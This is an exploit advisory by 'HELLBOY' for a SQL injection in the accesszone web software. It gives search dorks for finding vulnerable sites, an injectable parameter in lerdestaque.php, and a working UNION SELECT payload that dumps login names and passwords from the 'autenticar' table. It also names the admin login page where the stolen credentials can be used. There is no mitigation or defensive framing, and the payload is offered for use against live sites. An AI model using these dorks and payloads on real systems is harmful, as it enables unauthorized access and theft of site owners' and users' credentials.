======================================
accesszone SQL Injection Vulnerability
======================================
#######################################################
# IN THE NAME OF GOD
#
# accesszone SQL Injection Vulnerability
#
# Author : HELLBOY
#
# Tested on Lunix
#
# CVE : N/A
#
# Gmail : A68.HELLBOY@GMAIL.COM
#
# Dork : inurl:"lerdestaque.php?id="
#
# DORK : "powered by accesszone"
########################################################
# Exploit :
# http://[site]/lerdestaque.php?id={SQLI}
#
# EXAM: http://[site]/lerdestaque.php?id=-1+union+select+1,concat(login,0x3a,senha),3,4,5+from+autenticar--
#
# PAGE LOGIN : http://[site]/login/login.php
#
#########################################################
# Greetz :
# All members of the Forum WwW.ASHIYANE.ORG
#
######################################################### |
|
